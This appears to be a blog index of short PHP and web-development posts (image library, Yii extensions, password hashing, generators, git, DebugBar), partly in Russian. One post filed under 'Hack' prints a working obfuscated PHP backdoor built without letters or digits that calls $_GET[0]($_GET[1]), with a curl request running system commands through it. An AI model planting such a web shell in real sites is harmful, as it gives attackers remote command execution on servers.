Posted by & filed under Webdev.

Intervention Image Class is an image handling and manipulation wrapper library using PHP GD library.

The class is written to make PHP image manipulating more easier and expressive. No matter if you want to create image thumbnails, watermarks or format large image files Intervention Image Class helps you to manage every task in an easy way with as little lines of code as possible.

The library follows the FIG standard PSR-2 to ensure a high level of interoperability between shared PHP code and is fully unit-tested.

Basic example:

$img = Image::make('public/foo.jpg')->resize(320, 240)->insert('public/watermark.png');

Source link

Posted by & filed under Webdev.

Начало положено, первые махонький проектик написан на связке PhpStorm + Yii.

Очень конечно продуманны оба продукта. В Шторме удобно деплоить, коммитить и вообще код писать. Конечно очень нехватает multiple selection из SublimeText 3 – но плюсов больше и можно пойти на жертву. Про Yii конечно пока не очень понятно, то ли все точить на нем, то ли перейти на Symfony 2.

Posted by & filed under Webdev.

JavaScript – это большой мыльный пузырь.

Это замок из песка.

Такой же, как, скажем, .COM.

Как любой пузырь, JavaScript рано или поздно должен лопнуть.

Конечно, он везде. Он вроде бы стремительно развивается. Но, бьюсь об заклад, настанет момент, когда JavaScript будет сброшен со своего трона, потеряв свой скипетр в виде jQuery.

JavaScript на самом деле никогда не возвращался.

JavaScript стоит не на своих ногах, он сидит на шее у другой технологии. От JavaScript пытались отказаться давным-давно. Если бы JavaScript был по-настоящему хорошим языком, его оценили бы много лет назад, когда он только вошёл в обиход. А я прекрасно помню, какие проклятия я насылал на него 15 лет назад. И не я один. Да, тёмные были времена, но просто попытайтесь вспомнить свою ненависть к JavaScript. До того, как он стал классным.
Read more »

Posted by & filed under Webdev.

Yiistrap is the new generation of the Yii-Bootstrap extension from integrator Yii2 bootstrap.

Yii-Bootstrap was an awesome extension library, but it was too widget hierarchical, thus slow compared to this new approach. We though that we could replace all that with a robust html helper, and to tell you truth, we are very happy with the results.

Yiiwheels is the extension library for Yiistrap. Yii Wheels has been completely rebuilt from ground up. It differs from its predecessor, YiiBooster, in that widgets and their assets are isolated in their own folders; which promotes better and easier maintenance. YiiBooster had to register all its required assets at the once, and developers soon realized that this slowed things down, as compared to Yii-Bootstrap’s performance. Now, with YiiWheels, you register only what you need, when you need it, nothing else, nothing more. Simple, but elegant.

Posted by & filed under Webdev.

Using bcrypt is the currently accepted best practice for hashing passwords, but a large number of developers still use older and weaker algorithms like MD5 and SHA1. Some developers don’t even use a salt while hashing. The new hashing API in PHP 5.5 aims to draw attention towards bcrypt while hiding its complexity. In this article I’ll cover the basics of using PHP’s new hashing API.

The new password hashing API exposes four simple functions:

  • password_hash() – used to hash the password.
  • password_verify() – used to verify a password against its hash.
  • password_needs_rehash() – used when a password needs to be rehashed.
  • password_get_info() – returns the name of the hashing algorithm and various options used while hashing.

Read more »

Posted by & filed under Hack.

It’s possible to write php backdoor without chars&numbers in source! Look at below code:

<?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$$_[$__+ $__];
$_[@-_]($_[@!+_] );

Main idea of this code is using Bitwise Operators for store $_GET and then call $_GET[0]($_GET[1]) for calling any php function with any argument. For example:

$ curl 'httx://127.0.0.1:9999/shell.php?0=system&1=uname%20-a'
Linux linux 3.7-trunk-amd64 #1 SMP Debian 3.7.2-0+kali8 x86_64 GNU/Linux

Source link

Posted by & filed under Webdev.

How do Generators Work?
According to Wikipedia, a generator “is very similar to a function that returns an array, in that a generator has parameters, can be called, and generates a sequence of values”. A generator is basically a normal function, but instead of returning a value it yields as many values as it needs to. It looks like a function but acts like an iterator.

Generators use the yield keyword instead of return. It acts similar to return in that it returns a value to the caller of the function, but instead of removing the function from the stack, yield saves its state. This allows the function to continue from where it was when it’s called again. In fact, you cannot return a value from a generator although you can use return without a value to terminate its execution.

Our First Generator:

Generators are not a new concept and already exist in languages such as C#, Python, JavaScript, and Ruby (enumerators), and are usually identified by their use of the yield keyword. The following is an example in Python:

def file_lines(filename):
    file = open(filename)
    for line in file:
        yield line
    file.close()
 
for line in file_lines('somefile'):
    #do some work here

Let’s rewrite the example Python generator in PHP. (Note that both snippets do not perform any sort of error checking.)

<?php
function file_lines($filename) {
    $file = fopen($filename, 'r'); 
    while (($line = fgets($file)) !== false) {
        yield $line; 
    } 
    fclose($file); 
}
 
foreach (file_lines('somefile') as $line) {
    // do some work here
}

Read more »

Posted by & filed under Webdev.

Данное повествование подразумевает знакомство читателей с такими командами git как: add, pull, push, commit.

В случае многопользовательской работы с репозиторием зачастую получается такая ситуация: сделали мы git pull, правим код, коммитим, хотим пропихнуть код в общий репозиторий, а тут-то нам и говорят: фигу вам, а не push — там уже всё поменялось. В итоге приходится делать git pull, получается вынужденный автоматический merge и с этим уродливым merge (который был по сути и необязателен!) мы запихиваем наши изменения обратно в общий репозиторий. История изменений получается не самая красивая.

Ниже будет рассказано о том, как же можно избежать подобных конфузов и прослыть знатоком git kung-fu.

Read more »

Posted by & filed under Webdev.

Debugging in PHP has never been easier

The DebugBar integrates easily in any projects and can display profiling data from any part of your application. It comes built-in with data collectors for standard PHP features and popular projects.

Source

Features:

  • Generic debug bar with no other dependencies
  • Easy to integrate with any project
  • Clean, fast and easy to use interface
  • Handles AJAX request
  • Includes generic data collectors and collectors for well known libraries
  • The client side bar is 100% coded in javascript
  • Easily create your own collectors and their associated view in the bar
  • Save and re-open previous requests